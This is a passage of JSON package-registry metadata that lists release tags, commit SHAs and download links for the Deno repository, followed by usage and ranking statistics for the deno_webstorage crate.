Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T13:36:09.780Z","dependent_packages_count":11,"downloads":620551,"downloads_period":"total","dependent_repos_count":31,"rankings":{"downloads":5.608873740544743,"dependent_repos_count":5.108702968297772,"dependent_packages_count":3.249594268149489,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.466802443518677},"purl":"pkg:cargo/deno_webstorage","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_webstorage","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.